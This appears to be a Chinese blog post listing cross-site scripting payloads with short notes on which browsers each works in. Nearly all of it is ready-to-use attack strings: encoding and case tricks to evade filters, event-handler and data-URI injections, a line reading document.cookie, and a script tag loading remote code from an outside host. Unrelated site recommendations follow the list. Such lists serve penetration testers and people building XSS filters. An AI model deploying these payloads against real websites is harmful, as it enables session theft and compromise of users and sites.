XSS的一些payload

";alert(1);//xx


¼script¾alert(¢XSS¢)¼/script¾   //US-ASCII编码,如Tomcat

<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>    //IE7以下
<![endif]-->

</title><script>alert(1);</script>



<a href="javascript:alert(1)">aaaa</a>
<a href="JavaSCript:alealertrt%25281%2529">aaaa</a>
<a onclick=alert(1)>XSS</a>
<a onmouseover=alert(1)>XSS</a>


<body onload=alert(1)>  //无需js标签,可直接执行
<body background="javascript:alert('XSS')">  //IE7以下


<DIV style="background-image: url(javascript:alert('XSS'))">  //IE7以下
<DIV style="width: expression(alert('XSS'));">


<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" allowscriptaccess="always"></embed>  //Firefox/Chrome



<iframe src="javascript:alert(1)"></iframe>
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>    //Firefox/Chrome/Safari
<iframe src=# onmouseover="alert(document.cookie)"></iframe>



'"><img onmouseover=alert(1)>  //IE
<img onmouseover=alert(1) src>  //IE
<img src=x onmouseover=alert(1)>
<img src=x onerror=alert(1)>
<img/src=x onerror=alert(1)>
<img src=1 alt=al lang=ert onerror=top[url=1]alt+lang[/url]>
// 下面的img标签都是在IE7以下版本生效
<img src=JaVaScRiPt:alert(1)>
<img src=javascript:alert(String.fromCharCode(49))>
<img src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<img src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<img src=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<img src="jav   ascript:alert('XSS')">  <!-- 这里空格是tab -->
<img src="jav&#x09;ascript:alert('XSS');"> <!-- &#x09;是tab -->
<img src="jav&#x0D;ascript:alert('XSS');"> <!-- &#x0D;是回车 -->
<img src=" &#14;  javascript:alert('XSS');">
<img DYNsrc="javascript:alert('XSS')">
<img LOWsrc="javascript:alert('XSS')">
<img src=`javascript:alert('xxxxx')`>
<img src='vbscript:msgbox("XSS")'>



<input type=image src=x onerror=alert(1)>
<input type="IMAGE" src="javascript:alert('XSS');"> //IE7以下


<link rel="stylesheet" href="javascript:alert('XSS');">  //IE7以下

<meta http-equiv="refresh" content="x;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">  //Firefox


<script>alert(1)</script>
<sCrIpt>alert(1)</ScRipt>
<sCrsCrIptIpt>alalertert(1)</ScRsCrIptipt>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<script>window[url=0]'alert'[/url]</script>
<script>parent[url=1]'alert'[/url]</script>
<script>self[url=2]'alert'[/url]</script>
<script>top[url=3]'alert'[/url]</script>
<script src=http://www.xss.com/1.js></script>
[quote]</script>">'><script>alert(String.fromCharCode(49))</script>
<<SCRIPT>alert(1);//<</SCRIPT>[/quote]



<style>li{list-style-image: url("javascript:alert('XSS')");}</style><ul><li>XSS</br>  //IE7以下
<style>a{width:expression(alert('11'))}</style><a href="x"></a>  //IE7以下
<style>.xss{background-image:url("javascript:alert('XSS')");}</style><a class=xss></a>  //IE7以下
<style type="text/css">BODY{background:url("javascript:alert('XSS')");}</style>  //IE7以下


<svg/onload=alert(1)>


<table BACKGROUND="javascript:alert('XSS')">  //IE7以下
<table><TD BACKGROUND="javascript:alert('XSS')">  //IE7以下
<div style="background-image: url(javascript:alert('XSS'));">  //IE7以下
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,776评论 6 496
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,527评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 160,361评论 0 350
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,430评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,511评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,544评论 1 293
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,561评论 3 414
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,315评论 0 270
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,763评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,070评论 2 330
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,235评论 1 343
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,911评论 5 338
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,554评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,173评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,424评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,106评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,103评论 2 352

推荐阅读更多精彩内容

  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 134,647评论 18 139
  • 之前积累了XSS 有一段时间,因为目前开始了一件有趣的工程,需要整合非常多的知识,其中Web 安全这一块出现最多的...
    刀背藏身阅读 9,051评论 0 16
  • 前段时间在学习Web安全方面的知识,对这方面有了进一步的了解,决定写文章记录下来,只是对Web安全方面知识的一些总...
    邱振源的博客阅读 1,264评论 0 1
  • 客户端(浏览器)安全 同源策略(Same Origin Policy) 同源策略阻止从一个源加载的文档或脚本获取或...
    人在码途阅读 1,764评论 0 8
  • 补充句子~ 当我满足父母的时候我是 当我满足父母的时候我是 当我满足父母的时候我是 当我满足孩子的时候我是 当我满...
    海霞OH卡咨询师阅读 159评论 0 0